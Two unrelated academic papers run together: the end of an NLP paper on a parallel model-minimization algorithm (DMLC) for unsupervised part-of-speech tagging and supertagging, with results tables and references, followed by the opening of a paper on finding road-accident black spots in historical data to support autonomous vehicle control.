The DMLC algorithm is directly suited towards parallelization across many machines. We turn to Pregel (Malewicz et al., 2010), and its open source version Giraph (Apa, 2013). In these systems the computation proceeds in rounds. In every round, every machine does some local processing and then sends arbitrary messages to other machines. Semantically, we think of the communication graph as fixed, and in each round each vertex performs some local computation and then sends messages to its neighbors. This mode of parallel programming directs the programmers to "Think like a vertex." The specific systems like Pregel and Giraph build infrastructure that ensures that the overall system is fault tolerant, efficient, and fast.
In addition, they provide implementation of commonly used dis- tributed data structures, such as, for example global counters. The programmer’s job is simply to specify the code that each vertex will run at every round. We implemented the DMLC algorithm in Pregel. The implementation is straightforward and given in Algorithm 2. The multi-set M of Algorithm 1 is represented as a global counter in Algorithm 2. The message passing (Step 3) and counter update (Step 4) steps update this global counter and hence per- form the role of Step 3 of Algorithm 1. Step 5 se- lects the label with largest count, which is equivalent to the greedy label picking step 6 of Algorithm 1. Fi- nally steps 6, 7, and 8 update the tag assignment of each vertex performing the roles of steps 7, 8, and 9, respectively, of Algorithm 1. 5.1 Speeding up the Algorithm The implementation described above directly copies the sequential algorithm. Here we describe addi- tional steps we took to further improve the parallel running times. Singleton Sets: As the parallel algorithm pro- ceeds, the set of feasible sets associated with a node slowly decreases. At some point there is only one tag that a node can take on, however this tag is rare, and so it takes a while for it to be selected using the greedy strategy. Nevertheless, if a node and one of its neighbors have only a single tag left, then it is safe to assign the unique label 2. Modifying the Graph: As is often the case, the bottleneck in parallel computations is the commu- nication. To reduce the amount of communication we reduce the graph on the fly, removing nodes and edges once they no longer play a role in the compu- tation. This simple modification decreases the com- munication time in later rounds as the total size of the problem shrinks. 6 Experiments and Results In this Section, we describe the experimental setup for various tasks, settings and compare empirical performance of our method against several existing 2We must judiciously initialize the global counter to take care of this assignment, but this is easily accomplished. baselines. The performance results for all systems (on all tasks) are measured in terms of tagging accu- racy, i.e. % of tokens from the test corpus that were labeled correctly by the system. 6.1 Part-of-Speech Tagging Task 6.1.1 Tagging Using a Complete Dictionary Data: We use a standard test set (consisting of 24,115 word tokens from the Penn Treebank) for the POS tagging task. The tagset consists of 45 dis- tinct tag labels and the dictionary contains 57,388 word/tag pairs derived from the entire Penn Tree- bank. Per-token ambiguity for the test data is about 1.5 tags/token. In addition to the standard 24k dataset, we also train and test on larger data sets— 973k tokens from the Penn Treebank, 3M tokens from PTB+Europarl (Koehn, 2005) data. Methods: We evaluate and compare performance for POS tagging using four different methods that employ the model minimization idea combined with EM training: • EM: Training a bigram HMM model using EM algorithm (Merialdo, 1994). • ILP + EM: Minimizing grammar size using integer linear programming, followed by EM training (Ravi and Knight, 2009). • MIN-GREEDY + EM: Minimizing grammar size using the two-step greedy method (Ravi et al., 2010b). • DMLC + EM: This work. Results: Table 1 shows the results for POS tag- ging on English Penn Treebank data. 
On the smaller test datasets, all of the model minimization strategies (methods 2, 3, 4) tend to perform equally well, yielding state-of-the-art results and a large improvement over standard EM. When training (and testing) on larger corpora sizes, DMLC yields the best reported performance on this task to date. A major advantage of the new method is that it can easily scale to large corpora sizes, and the distributed nature of the algorithm still permits fast, efficient optimization of the global objective function. So, unlike the earlier methods (such as MIN-GREEDY), it is fast enough to run on several millions of tokens to yield additional performance gains (shown in the last column).

Speedups: We also observe a significant speedup when using the parallelized version of the DMLC algorithm. Performing model minimization on the 24k tokens dataset takes 55 seconds on a single machine, whereas parallelization permits model minimization to be feasible even on large datasets. Fig 1 shows the running time for DMLC when run on a cluster of 100 machines. We vary the input data size from 1M word tokens to about 8M word tokens, while holding the resources constant. Both the algorithm and its distributed implementation in DMLC are linear time operations, as evident from the plot. In fact, for comparison, we also plot a straight line passing through the first two runtimes. The straight line essentially plots runtimes corresponding to a linear speedup. DMLC clearly achieves better runtimes, showing even better than linear speedup. The reason for this is that the distributed version has a constant overhead for initialization, independent of the data size, while the running time of the rest of the implementation is linear in the data size. Thus, as the data size becomes larger, the constant overhead becomes less significant, and the distributed implementation appears to complete slightly faster as the data size increases.

Figure 1: Runtime vs. data size (measured in # of word tokens) on 100 machines. For comparison, we also plot a straight line passing through the first two runtimes. The straight line essentially plots runtimes corresponding to a linear speedup. DMLC clearly achieves better runtimes showing a better than linear speedup.

Table 1: Results for unsupervised part-of-speech tagging on the English Penn Treebank dataset. Tagging accuracies for different methods are shown on multiple datasets. te shows the size (number of tokens) of the test data, tr represents the size of the raw text used to perform model minimization.

Method                                     Tagging accuracy (%)
                                           te=24k    te=973k
                                           tr=24k    tr=973k   tr=3.7M
1. EM                                      81.7      82.3      -
2. ILP + EM (Ravi and Knight, 2009)        91.6      -         -
3. MIN-GREEDY + EM (Ravi et al., 2010b)    91.6      87.1      -
4. DMLC + EM (this work)                   91.4      87.5      87.8

6.1.2 Tagging Using Incomplete Dictionaries

We also evaluate our approach for POS tagging under other resource-constrained scenarios. Obtaining a complete dictionary is often difficult, especially for new domains. To verify the utility of our method when the input dictionary is incomplete, we evaluate against standard datasets used in previous work (Garrette and Baldridge, 2012) and compare against the previous best reported performance for the same task.
In all the experiments (described here and in subsequent sections), we use the fol- lowing terminology—raw data refers to unlabeled text used by different methods (for model minimiza- tion or other unsupervised training procedures such as EM), dictionary consists of word/tag entries that are legal, and test refers to data over which tagging evaluation is performed. English Data: For English POS tagging with in- complete dictionary, we evaluate on the Penn Tree- bank (Marcus et al., 1993) data. Following (Garrette and Baldridge, 2012), we extracted a word-tag dic- tionary from sections 00-15 (751,059 tokens) con- sisting of 39,087 word types, 45,331 word/tag en- tries, a per-type ambiguity of 1.16 yielding a per- token ambiguity of 2.21 on the raw corpus (treating unknown words as having all 45 possible tags). As in their setup, we then use the first 47,996 tokens of section 16 as raw data and perform final evalua- tion on the sections 22-24. We use the raw corpus along with the unlabeled test data to perform model minimization and EM training. Unknown words are allowed to have all possible tags in both these pro- cedures. Italian Data: The minimization strategy pre- sented here is a general-purpose method that does not require any specific tuning and works for other languages as well. To demonstrate this, we also per- form evaluation on a different language (Italian) us- ing the TUT corpus (Bosco et al., 2000). Follow- ing (Garrette and Baldridge, 2012), we use the same data splits as their setting. We take the first half of each of the five sections to build the word-tag dic- tionary, the next quarter as raw data and the last quarter as test data. The dictionary was constructed from 41,000 tokens comprised of 7,814 word types, 8,370 word/tag pairs, per-type ambiguity of 1.07 and a per-token ambiguity of 1.41 on the raw data. The raw data consisted of 18,574 tokens and the test con- tained 18,763 tokens. We use the unlabeled corpus from the raw and test data to perform model mini- mization followed by unsupervised EM training. Other Languages: In order to test the effective- ness of our method in other non-English settings, we also report the performance of our method on sev- eral other Indo-European languages using treebank data from CoNLL-X and CoNLL-2007 shared tasks on dependency parsing (Buchholz and Marsi, 2006; Nivre et al., 2007). The corpus statistics for the five languages (Danish, Greek, Italian, Portuguese and Spanish) are listed below. For each language, we construct a dictionary from the raw training data. The unlabeled corpus from the raw training and test data is used to perform model minimization fol- lowed by unsupervised EM training. As before, un- known words are allowed to have all possible tags. We report the final tagging performance on the test data and compare it to baseline EM. Garrette and Baldridge (2012) treat unknown words (words that appear in the raw text but are missing from the dictionary) in a special manner and use several heuristics to perform better initialization for such words (for example, the probability that an unknown word is associated with a particular tag is conditioned on the openness of the tag). They also use an auto-supervision technique to smooth counts learnt from EM onto new words encountered dur- ing testing. In contrast, we do not apply any such technique for unknown words and allow them to be mapped uniformly to all possible tags in the dictio- nary. 
For this particular set of experiments, the only difference from the Garrette and Baldridge (2012) setup is that we include unlabeled text from the test data (but without any dictionary tag labels or special heuristics) to our existing word tokens from raw text for performing model minimization. This is a standard practice used in unsupervised training scenarios (for example, Bayesian inference methods) and in general for scalable techniques where the goal is to perform inference on the same data for which one wishes to produce some structured prediction.

Language       Train (tokens)   Dict (entries)   Test (tokens)
DANISH         94386            18797            5852
GREEK          65419            12894            4804
ITALIAN        71199            14934            5096
PORTUGUESE     206678           30053            5867
SPANISH        89334            17176            5694

Results: Table 2 (column 2) compares previously reported results against our approach for English. We observe that our method obtains a huge improvement over standard EM and gets comparable results to the previous best reported scores for the same task from (Garrette and Baldridge, 2012). It is encouraging to note that the new system achieves this performance without using any of the carefully-chosen heuristics employed by the previous method. However, we do note that some of these techniques can be easily combined with our method to produce further improvements.

Table 2 (column 3) also shows results on Italian POS tagging. We observe that our method achieves significant improvements in tagging accuracy over all the baseline systems, including the previous best system (+2.9%). This demonstrates that the method generalizes well to other languages and produces consistent tagging improvements over existing methods for the same task.

Results for POS tagging on CoNLL data in five different languages are displayed in Figure 2. Note that the proportion of raw data in test versus train (from the standard CoNLL shared tasks) is much smaller compared to the earlier experimental settings. In general, we observe that adding more raw data for EM training improves the tagging quality (the same trend observed earlier in Table 1: column 2 versus column 3). Despite this, DMLC + EM still achieves significant improvements over the baseline EM system on multiple languages (as shown in Figure 2). An additional advantage of the new method is that it can easily scale to larger corpora and it produces a much more compact grammar that can be efficiently incorporated for EM training.

Figure 2: Part-of-Speech tagging accuracy for different languages (Danish, Greek, Italian, Portuguese and Spanish) on CoNLL data using incomplete dictionaries, comparing EM and DMLC + EM.

6.1.3 Tagging for Low-Resource Languages

Learning part-of-speech taggers for severely low-resource languages (e.g., Malagasy) is very challenging. In addition to scarce (token-supervised) labeled resources, the tag dictionaries available for training taggers are tiny compared to other languages such as English. Garrette and Baldridge (2013) combine various supervised and semi-supervised learning algorithms into a common POS tagger training pipeline to address some of these challenges. They also report tagging accuracy improvements on low-resource languages when using the combined system over any single algorithm.
Their system has four main parts, in order: (1) tag dictionary expansion using a label propagation algorithm, (2) weighted model minimization, (3) Expectation Maximization (EM) training of HMMs using auto-supervision, (4) MaxEnt Markov Model (MEMM) training. The entire procedure results in a trained tagger model that can then be applied to tag any raw data.³ Step 2 in this procedure involves a weighted version of model minimization, which uses the multi-step greedy approach from Ravi et al. (2010b) enhanced with additional heuristics that use tag weights learnt via label propagation (in Step 1) within the minimization process.

³For more details, refer to (Garrette and Baldridge, 2013).

We replace the model minimization procedure in their Step 2 with our method (DMLC + EM) and directly compare this new system with their approach in terms of tagging accuracy. Note that for all other steps in the pipeline we follow the same procedure (and run the same code) as Garrette and Baldridge (2013), including the same smoothing procedure for EM initialization in Step 3.

Data: We use the exact same setup as Garrette and Baldridge (2013) and run experiments on Malagasy, an Austronesian language spoken in Madagascar. We use the publicly available data⁴: 100k raw tokens for training, a word-tag dictionary acquired with 4 hours of human annotation effort (used for type-supervision), and a held-out test dataset (5341 tokens). We provide the unlabeled corpus from the raw training data along with the word-tag dictionary as input to model minimization and evaluate on the test corpus. We run multiple experiments for different (incomplete) dictionary scenarios: (a) small = 2773 word/tag pairs, (b) tiny = 329 word/tag pairs.

⁴github.com/dhgarrette/low-resource-pos-tagging-2013

Results: Table 3 shows results on Malagasy data comparing a system that employs (unweighted) DMLC against the existing state-of-the-art system that incorporates a multi-step weighted model minimization combined with additional heuristics. We observe that switching to the new model minimization procedure alone yields a significant improvement in tagging accuracy under both dictionary scenarios. It is encouraging that a better minimization procedure also leads to higher tagging quality on the unknown word tokens (column 4 in the table), even when the input dictionary is tiny.

Table 2: Part-of-Speech tagging accuracy using PTB sections 00-15 and TUT to build the tag dictionary. For comparison, we also include the results for the previously reported state-of-the-art system (method 3) for the same task.

Method                                                                    Tagging accuracy (%)
                                                                          English (PTB 00-15)   Italian (TUT)
1. Random                                                                 63.53                 62.81
2. EM                                                                     69.20                 60.70
3. Type-supervision + HMM initialization (Garrette and Baldridge, 2012)   88.52                 72.86
4. DMLC + EM (this work)                                                  88.11                 75.79

Table 3: Part-of-Speech tagging accuracy for a low-resource language (Malagasy) on All/Known/Unknown tokens in the test data. Tagging performance is shown for multiple experiments using different (incomplete) dictionary sizes: (a) small, (b) tiny (shown in parentheses). The new method (row 2) significantly outperforms the existing method with p < 0.01 for the small dictionary and p < 0.05 for the tiny dictionary.

Method                                                      Tagging accuracy (%)
                                                            Total         Known         Unknown
Low-resource tagging using (Garrette and Baldridge, 2013)   80.7 (70.2)   87.6 (90.3)   66.1 (45.1)
Low-resource tagging using DMLC + EM (this work)            81.1 (70.8)   87.9 (90.3)   66.7 (46.5)
6.2 Supertagging

Compared to POS tagging, a more challenging task is learning supertaggers for lexicalized grammar formalisms such as Combinatory Categorial Grammar (CCG) (Steedman, 2000). For example, CCGbank (Hockenmaier and Steedman, 2007) contains 1241 distinct supertags (lexical categories) and the most ambiguous word has 126 supertags. This provides a much more challenging starting point for the semi-supervised methods typically applied to the task. Yet, this is an important task since creating grammars and resources for CCG parsers for new domains and languages is highly labor- and knowledge-intensive.

As described earlier, our approach scales easily to large datasets as well as label sizes. To evaluate it on the supertagging task, we use the same dataset from (Ravi et al., 2010a) and compare against their baseline method that uses a modified (two-step) version of the ILP formulation for model minimization.

Table 4: Results for unsupervised supertagging with a dictionary. Here, we report the total accuracy as well as accuracy on just the ambiguous tokens (i.e., tokens which have more than one tagging possibility). *The baseline method 2 requires several pre-processing steps in order to run feasibly for this task (described in Section 6.2). In contrast, the new approach (DMLC) runs fast and also permits efficient parallelization.

Method                               Supertagging accuracy (%)
                                     Ambiguous     Total
1. EM                                38.7          45.6
2. ILP* + EM (Ravi et al., 2010a)    52.1          57.3
3. DMLC + EM (this work)             55.9          59.3

Data: We use the CCGbank data for this experiment. This data was created by semi-automatically converting the Penn Treebank to CCG derivations (Hockenmaier and Steedman, 2007). We use the standard splits of the data used in semi-supervised tagging experiments (Banko and Moore, 2004): sections 0-18 for training (i.e., to construct the word-tag dictionary), and sections 22-24 for test.

Results: Table 4 compares the results for two baseline systems: standard EM (method 1), and a previously reported system using model minimization (method 2) for the same task. We observe that DMLC produces better taggings than either of these and yields a significant improvement in accuracy (+2% overall, +3.8% on ambiguous tokens). Note that it is not feasible to run the ILP-based baseline (method 2 in the table) directly since it is very slow in practice, so Ravi et al. (2010a) use a set of pre-processing steps to prune the original grammar size (unique tag pairs) from >1M to several thousand entries, followed by a modified two-step ILP minimization strategy. This is required to permit their model minimization step to be run in a feasible manner. On the other hand, the new approach DMLC (method 3) scales better even when the data/label sizes are large, hence it can be run with the full data using the original model minimization formulation (rather than a two-step heuristic).

Ravi et al. (2010a) also report further improvements using an alternative approach involving an ILP-based weighted minimization procedure. In Section 7 we briefly discuss how the DMLC method can be extended to this setting and combined with other similar methods.

7 Discussion and Conclusion

We present a fast, efficient model minimization algorithm for unsupervised tagging that improves upon previous two-step heuristics. We show that under a fairly natural assumption of c-feasibility the solution obtained by our minimization algorithm is O(c log m)-approximate to the optimal.
Although in the case of two-step heuristics, the first step guar- antees an O(log m)-approximation, the second step, which is required to get a consistent solution, can introduce many additional labels resulting in a so- lution arbitrarily away from the optimal. Our one step approach ensures consistency at each step of the algorithm, while the c-feasibility assumption means that the solution does not diverge too much from the optimal in each iteration. In addition to proving approximation guarantees for the new algorithm, we show that it is paralleliz- able, allowing us to easily scale to larger datasets than previously explored. Our results show that the algorithm achieves state-of-the-art performance, outperforming existing methods on several differ- ent tasks (both POS tagging and supertagging) and works well even with incomplete dictionaries and extremely low-resource languages like Malagasy. For future work, it would be interesting to apply a weighted version of the DMLC algorithm where la- bels (i.e., tag pairs) can have different weight distri- butions instead of uniform weights. Our algorithm can be extended to allow an input weight distribu- tion to be specified for minimization. In order to initialize the weights we could use existing strate- gies such as grammar-informed initialization (Ravi et al., 2010a) or output distributions learnt via other methods such as label propagation (Garrette and Baldridge, 2013). References 2013. Apache giraph. http://giraph.apache. org/. Michele Banko and Robert C. Moore. 2004. Part-of- speech tagging in context. In Proceedings of COLING, pages 556–561. Andrew R Barron, Jorma Rissanen, and Bin Yu. 1998. The Minimum Description Length Principle in Cod- ing and Modeling. IEEE Transactions of Information Theory, 44(6):2743–2760. Cristina Bosco, Vincenzo Lombardo, Daniela Vassallo, and Leonardo Lesmo. 2000. Building a Treebank for Italian: a data-driven annotation schema. In Proceed- ings of the Second International Conference on Lan- guage Resources and Evaluation LREC-2000, pages 99–105. Sabine Buchholz and Erwin Marsi. 2006. Conll-x shared task on multilingual dependency parsing. In Proceed- ings of CoNLL, pages 149–164. Christos Christodoulopoulos, Sharon Goldwater, and Mark Steedman. 2010. Two decades of unsupervised POS induction: How far have we come? In Proceed- ings of the Conference on Empirical Methods in Natu- ral Language Processing (EMNLP), pages 575–584. Dipanjan Das and Slav Petrov. 2011. Unsupervised part- of-speech tagging with bilingual graph-based projec- tions. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics: Hu- man Language Technologies - Volume 1, pages 600– 609. A. P. Dempster, N. M. Laird, and D. B. Rubin. 1977. Maximum likelihood from incomplete data via the EM algorithm. Journal of the Royal Statistical Society, Se- ries B, 39(1):1–38. Kuzman Ganchev, João Graça, Jennifer Gillenwater, and Ben Taskar. 2010. Posterior regularization for struc- tured latent variable models. Journal of Machine Learning Research, 11:2001–2049. Dan Garrette and Jason Baldridge. 2012. Type- supervised Hidden Markov Models for part-of-speech tagging with incomplete tag dictionaries. In Proceed- ings of the Conference on Empirical Methods in Nat- ural Language Processing and Computational Natu- ral Language Learning (EMNLP-CoNLL), pages 821– 831. Dan Garrette and Jason Baldridge. 2013. Learning a part-of-speech tagger from two hours of annotation. 
In Proceedings of the Conference of the North American Chapter of the Association for Computational Linguis- tics: Human Language Technologies, pages 138–147. Kevin Gimpel, Nathan Schneider, Brendan O’Connor, Dipanjan Das, Daniel Mills, Jacob Eisenstein, Michael Heilman, Dani Yogatama, Jeffrey Flanigan, and Noah A. Smith. 2011. Part-of-speech tagging for Twitter: annotation, features, and experiments. In Pro- ceedings of the 49th Annual Meeting of the Associa- tion for Computational Linguistics: Human Language Technologies: short papers - Volume 2, pages 42–47. Yoav Goldberg, Meni Adler, and Michael Elhadad. 2008. EM can find pretty good HMM POS-taggers (when given a good start). In Proceedings of ACL, pages 746–754. Sharon Goldwater and Thomas L. Griffiths. 2007. A fully Bayesian approach to unsupervised part-of- speech tagging. In ACL. Fernando C. Gomes, Cludio N. Meneses, Panos M. Pardalos, and Gerardo Valdisio R. Viana. 2006. Ex- perimental analysis of approximation algorithms for the vertex cover and set covering problems. Kazi Saidul Hasan and Vincent Ng. 2009. Weakly super- vised part-of-speech tagging for morphologically-rich, resource-scarce languages. In Proceedings of the 12th Conference on the European Chapter of the Associa- tion for Computational Linguistics, pages 363–371. Julia Hockenmaier and Mark Steedman. 2007. CCG- bank: A corpus of CCG derivations and dependency structures extracted from the Penn Treebank. Compu- tational Linguistics, 33(3):355–396. Mark Johnson. 2007. Why doesn’t EM find good HMM POS-taggers? In Proceedings of the Joint Conference on Empirical Methods in Natural Language Process- ing and Computational Natural Language Learning (EMNLP-CoNLL), pages 296–305. Philipp Koehn. 2005. Europarl: A Parallel Corpus for Statistical Machine Translation. In Machine Transla- tion Summit X, pages 79–86. Grzegorz Malewicz, Matthew H. Austern, Aart J.C Bik, James C. Dehnert, Ilan Horn, Naty Leiser, and Grze- gorz Czajkowski. 2010. Pregel: a system for large- scale graph processing. In Proceedings of the 2010 ACM SIGMOD International Conference on Manage- ment of data, pages 135–146. Mitchell P. Marcus, Beatrice Santorini, and Mary Ann Marcinkiewicz. 1993. Building a large annotated cor- pus of English: The Penn Treebank. Computational Linguistics, 19(2):313–330. Bernard Merialdo. 1994. Tagging English text with a probabilistic model. Computational Linguistics, 20(2):155–171. Taesun Moon, Katrin Erk, and Jason Baldridge. 2010. Crouching Dirichlet, Hidden Markov Model: Unsu- pervised POS tagging with context local tag genera- tion. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 196– 206. Joakim Nivre, Johan Hall, Sandra Kübler, Ryan McDon- ald, Jens Nilsson, Sebastian Riedel, and Deniz Yuret. 2007. The CoNLL 2007 shared task on dependency parsing. In Proceedings of the CoNLL Shared Task Session of EMNLP-CoNLL, pages 915–932. Sujith Ravi and Kevin Knight. 2009. Minimized models for unsupervised part-of-speech tagging. In Proceed- ings of the Joint Conferenceof the 47th Annual Meet- ing of the Association for Computational Linguistics and the 4th International Joint Conference on Natural Language Processing of the Asian Federation of Natu- ral Language Processing (ACL-IJCNLP), pages 504– 512. Sujith Ravi, Jason Baldridge, and Kevin Knight. 2010a. Minimized models and grammar-informed initializa- tion for supertagging with highly ambiguous lexicons. 
In Proceedings of the 48th Annual Meeting of the As- sociation for Computational Linguistics (ACL), pages 495–503. Sujith Ravi, Ashish Vaswani, Kevin Knight, and David Chiang. 2010b. Fast, greedy model minimization for unsupervised tagging. In Proceedings of the 23rd In- ternational Conference on Computational Linguistics (COLING), pages 940–948. Roi Reichart, Raanan Fattal, and Ari Rappoport. 2010. Improved unsupervised POS induction using intrinsic clustering quality and a Zipfian constraint. In Proceed- ings of the Fourteenth Conference on Computational Natural Language Learning, pages 57–66. Mark Steedman. 2000. The Syntactic Process. MIT Press, Cambridge, MA, USA. Kristina Toutanova and Mark Johnson. 2008. A Bayesian LDA-based model for semi-supervised part- of-speech tagging. In Advances in Neural Information Processing Systems (NIPS), pages 1521–1528. work_3bm3dechy5didpwd3zolcdcwti ---- Analysis of historical road accident data supporting autonomous vehicle control strategies Analysis of historical road accident data supporting autonomous vehicle control strategies Sándor Szénási1,2 1 Faculty of Economics and Informatics, J. Selye University, Komárno, Slovakia 2 John von Neumann Faculty of Informatics, Óbuda University, Budapest, Hungary ABSTRACT It is expected that most accidents occurring due to human mistakes will be eliminated by autonomous vehicles. Their control is based on real-time data obtained from the various sensors, processed by sophisticated algorithms and the operation of actuators. However, it is worth noting that this process flow cannot handle unexpected accident situations like a child running out in front of the vehicle or an unexpectedly slippery road surface. A comprehensive analysis of historical accident data can help to forecast these situations. For example, it is possible to localize areas of the public road network, where the number of accidents related to careless pedestrians or bad road surface conditions is significantly higher than expected. This information can help the control of the autonomous vehicle to prepare for dangerous situations long before the real-time sensors provide any related information. This manuscript presents a data-mining method working on the already existing road accident database records to find the black spots of the road network. As a next step, a further statistical approach is used to find the significant risk factors of these zones, which result can be built into the controlling strategy of self- driven cars to prepare them for these situations to decrease the probability of the potential further incidents. The evaluation part of this paper shows that the robustness of the proposed method is similar to the already existing black spot searching algorithms. However, it provides additional information about the main accident patterns. Subjects Autonomous Systems, Data Mining and Machine Learning, Spatial and Geographic Information Systems Keywords Data mining, DBSCAN, Road accident, Statistics, Autonomous vehicle, Road safety INTRODUCTION Human drivers have many disadvantages compared to autonomous vehicles (slower reaction time, inattentiveness, variable physical condition) (Kertesz & Felde, 2020). Nevertheless, they can often perform better (Chatterjee et al., 2002) in some unexpected situations like a child running out in front of the vehicle. 
This is because, beyond the information gained in real time, they may have specific knowledge about a given location (linked to the previous example, the human driver may know that there is a playground without a fence near the road; therefore, the appearance of a child is not unexpected). Drivers also have some incomplete but useful historical knowledge about accidents, and they can build this information into their driving behavior. If they know that there were several pedestrian collisions somewhere, they will decrease their speed and try to be more attentive without triggering real-time signals. Thanks to this behavior, they can prepare for and avoid some types of accidents, which would not be possible without this historical data.

We propose the following consecutive steps to integrate historical data into the control algorithm for autonomous devices:

1. Localize accident black spots in an already existing accident database, using statistical or data-mining methods;
2. Determine the common reasons for these accidents with statistical analysis or pattern matching;
3. Specify the necessary preventive steps to decrease the probability of further accidents.

This article mainly focuses on the first two steps because the third one largely depends on the limits and equipment of the self-driven car. For example, in the case of dangerous areas, is it possible to increase the power of the lights to make the car more visible? Or, in the case of a large chance of pedestrian accidents, is it possible to increase the volume of the artificial engine sound to avoid careless road crossing? Can the car change the suspension settings to prepare for potentially dangerous road sections? The scope of this paper is the development of the theoretical background to support these preliminary protection activities.

The appropriate preliminary actions may significantly decrease the number and severity of road accidents. For example, Carsten & Tate (2005) present a model for the relationship between changes in vehicle speed and the number of accidents that occur. It is visible from this model (based on the national injury database of Great Britain to predict the effects of speed on road accidents) that for each 1 km/h change in mean speed, the best-estimated change of accident risk is 3%.
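To give a feel for the magnitude of this relationship, the snippet below applies the reported figure in a simple way. It is only an illustration: the multiplicative (compounding) interpretation of the 3% per km/h estimate, the normalized baseline, and the function name relative_risk are our assumptions, not the exact functional form of the Carsten & Tate (2005) model.

```python
# Illustrative only: rough effect of a speed change on accident risk,
# assuming the reported ~3% change per 1 km/h compounds multiplicatively.
BASE_RISK = 1.0          # normalized risk at the current mean speed (assumption)
PER_KMH_CHANGE = 0.03    # best-estimated change per 1 km/h (Carsten & Tate, 2005)

def relative_risk(delta_speed_kmh: float) -> float:
    """Relative accident risk after changing the mean speed by delta km/h."""
    return BASE_RISK * (1.0 + PER_KMH_CHANGE) ** delta_speed_kmh

# A 5 km/h reduction near a suspected pedestrian black spot:
print(round(relative_risk(-5.0), 3))  # ~0.863, i.e. roughly a 14% risk reduction
```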
Accordingly, it is worth making assumptions about the dangerous areas and adapting the control of the autonomous cars to these predictions.

BACKGROUND

Black spot identification

Black spot management (identification, analysis, and treatment of black spots in the public road network) is one of the most important tasks of road safety engineers. The identification of these extremely hazardous sections is the first step to prevent further accidents or to decrease their seriousness. It is a heavily researched area, and there are several theoretical methods for this purpose.

Although black spot management has a long tradition in traffic engineering, interestingly, there is no generally accepted definition of road accident black spots (also known as hot spots); the official definition varies by country. It follows that the method used to find these hazardous locations also varies by country. For example, by the definition of the Hungarian government, outside built-up areas black spots are defined as road sections no longer than 100 meters where the number of accidents during the last three years is at least 3. According to this, road safety engineers use simple threshold-based methods (for example, the traditional sliding window technique) to find these areas. Switzerland uses a significantly different definition, as black spots are sections of the road network (or intersections) where the number of accidents is "well above" the number of accidents at comparable sites. The key difference is the term "comparable sites", because these advanced comparative methods do not try to classify each road segment by itself but try to compare it to similar areas.

There are some general attributes of accident black spots to overcome the conceptual confusion. These are usually well-defined sections or intersections of the public road network, where road accidents are historically concentrated (Elvik, 2008; Delorme & Lassarre, 2014; Murray, White & Ison, 2012; Montella et al., 2013; Hegyi, Borsos & Koren, 2017). Nowadays, road accidents are monitored by governments and all data about accidents are stored in large, reliable and partially public databases (without any personal information about the participants). Much data about the road network is also available (road layout, speed limits, traffic signs, etc.). As a result, road safety engineers can use several procedures from various fields (statistics, data mining, pattern recognition) to localize accident black spots in these databases.

It is a common assumption that the number of accidents is significantly higher at these locations compared to other sections of the road network. However, this alone is neither a necessary nor a sufficient condition. The variation of the average yearly accident count of road sections is relatively high compared to the number of accidents. Because of this, the regression-to-the-mean effect can distort the historical data. A given section with more accidents than average is not necessarily an accident black spot. The converse is also true, as there may be true black spots with relatively few accidents in a given year. Even though this deficiency has been theoretically proven, most black spot identification methods are based on the accident numbers of the last few years, simply because this is the best place to start a detailed analysis.
Nevertheless, it is always worth keeping in mind that these locations are just black spot candidates, and further examination is needed to make the right decision concerning them. The best way to do this is via a detailed scene investigation, but it is very expensive and time-consuming. Another theoretical approach can be the analysis of accident data to find some irregular patterns and identify one or more risk factors causing these accidents. Without these, it is possible that the higher frequency of accidents is purely coincidental at a given location and time.

To localize potential accident black spots, the most traditional procedure is the sliding window method (Lee & Lee, 2013; Elvik, 2008; Geurts et al., 2006). The input parameters of the process are the section length and a threshold value. The method is based on the following:

1. Divide the selected road into small, uniform-sized sections;
2. Count the number of accidents that have occurred in the last few years for each section;
3. Flag the segments where this number is higher than a given threshold as potential black spots.

There are many variants of the traditional sliding window method (Anderson, 2009; Szénási & Jankó, 2007). A potential alternative is to use a variable window length. One of its advantages is that it is unnecessary to set the appropriate parameter; it is sufficient to give a minimal and a maximal value. The method can try several window lengths to find the largest black spots possible. Due to this modification, it can find small local black spots and larger ones too. The traditional sliding window method uses non-overlapping segments, but it is also possible to slide the window with smaller steps than the window size. This leads to a more sensitive method, which can find more black spot candidates. However, it is also necessary to manage the overlapping black spots (considering these as one big cluster, or as multiple distinct ones). It is worth mentioning that the method has some additional advantages: it has very low computational demand (compared to the alternatives) and is based only on the road accident database.

The sliding window method is one of the first widely used procedures; therefore, it is based on the traditional road number + section number positioning system (for example, the accident location is Road 66, 12+450 kilometer+meter). This traditional positioning system was the only real alternative in the past. However, in the last decades, the spread of GPS technology has made it possible to collect the spatial coordinates of accidents. This step has several benefits (faster and more accurate localization) but also requires the rethinking of the already existing methods. It is possible to extend the sliding window method to a two-dimensional procedure, but this is not widely used. It is better to seek out more applicable methods fitting the spatial data given by the GPS coordinates. From this field, Kernel Density Estimation (KDE) methods are among the most popular spatial data analysis techniques (Bíl, Andrášik & Janoška, 2013; Flahaut et al., 2003; Anderson, 2009; Yu et al., 2014; Toran & Moridpour, 2015). These have been employed in many research projects to analyze road accidents. KDE methods have the advantages of simple implementation and easy understanding.
These also have the benefit of naturally handling the noise in the data (caused by the inaccuracy of GPS devices). In general, KDE is used as an estimation of the probability density function of a random variable. From the safety experts' point of view, the result of the KDE method is the accident density estimation at a given reference point. The procedure has several parameters, like the search radius distance from the reference point (bandwidth or kernel size) and the kernel function.

Several researchers recommend the use of empirical Bayesian methods combining the benefits of the predicted and historical accident frequencies. These models usually analyze the distributions of the already existing historical data from several aspects, and give predictions about the expected accident state. In the Empirical Bayesian method, the existing historical accident count and the expected accident count predicted by the model are added using different weights (Ghadi & Török, 2019). Because of this, this process requires an accurate accident prediction model.

Another group of already available methods is based on clustering techniques. These procedures are from the field of data mining, where clustering is one of the widely used unsupervised learning methods. In this context, a cluster is a group of items which are similar to each other and differ from items outside the cluster. Using this concept in the field of black spot searching, accidents with similar attributes (where the properties can be the location and/or other risk factors) can be considered as one cluster. Most studies use the basic K-means clustering method (Mauro, De Luca & Dell'Acqua, 2013), but there are also some fuzzy-based C-means solutions.

As already mentioned, the results of the proposed methods are just a set of black spot candidates. Further analysis is needed to make a final, valid decision as to whether it is a real accident black spot or not, and whether or not it requires any action. This is the point where our research turns away from traditional road safety management work (identification and elimination of black spots). Based on the collected clusters, road safety engineers must select the black spot candidates having the largest safety potential, which is based on the prediction of the effect of the best available preventive action (the cost of the local improvement activity compared to the expected benefits in the number and severity of further accidents).

